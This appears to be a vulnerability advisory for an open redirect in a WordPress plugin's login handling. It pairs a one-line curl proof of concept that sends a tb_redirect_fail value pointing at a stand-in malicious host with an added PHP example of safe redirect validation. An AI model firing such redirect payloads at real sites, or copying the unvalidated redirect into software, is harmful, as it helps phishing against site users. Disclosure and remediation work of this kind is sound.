Description

The plugin does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue.

```
curl -kvL https://www.example.com/wp-login.php \
  -e http://arbitrary-referer \
  -d "log=invalid_username&pwd=invalid_password&tb_login=1&tb_redirect_fail=https://malicious-site.com"
```

- `https://www.example.com` should be replaced with the affected WordPress site URL.
- The request triggers a 302 redirect to the URL specified in `tb_redirect_fail`.
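
One way a plugin could handle the `tb_redirect_fail` parameter safely, shown as an added example (not the plugin's own code, which this page does not include). The function name `tb_example_login_failed` is hypothetical, and the sketch assumes the redirect is issued from WordPress's `wp_login_failed` hook.

```php
<?php
// Added example, not the plugin's code. tb_example_login_failed is a
// hypothetical name; tb_login and tb_redirect_fail are the request
// parameters shown in the curl command above.

add_action( 'wp_login_failed', 'tb_example_login_failed' );

function tb_example_login_failed( $username ) {
    // Only act on login attempts that carry the plugin's parameters.
    if ( empty( $_POST['tb_login'] ) || empty( $_POST['tb_redirect_fail'] ) ) {
        return;
    }

    // WordPress adds slashes to request data; remove them before validating.
    $requested = wp_unslash( $_POST['tb_redirect_fail'] );

    // Unsafe pattern: passing $requested straight to wp_redirect() sends the
    // browser to whatever URL the request supplied.
    //
    // wp_validate_redirect() returns the fallback unless the target host is
    // the site's own host or one added through the allowed_redirect_hosts
    // filter, so an off-site value collapses to the login page.
    $target = wp_validate_redirect( $requested, wp_login_url() );

    // wp_safe_redirect() repeats the host check before emitting the
    // Location header, so a later code change cannot bypass it silently.
    wp_safe_redirect( $target );
    exit;
}
```

With this handling, the request above still produces a 302, but the `Location` header points at the site's own login URL rather than the supplied external address.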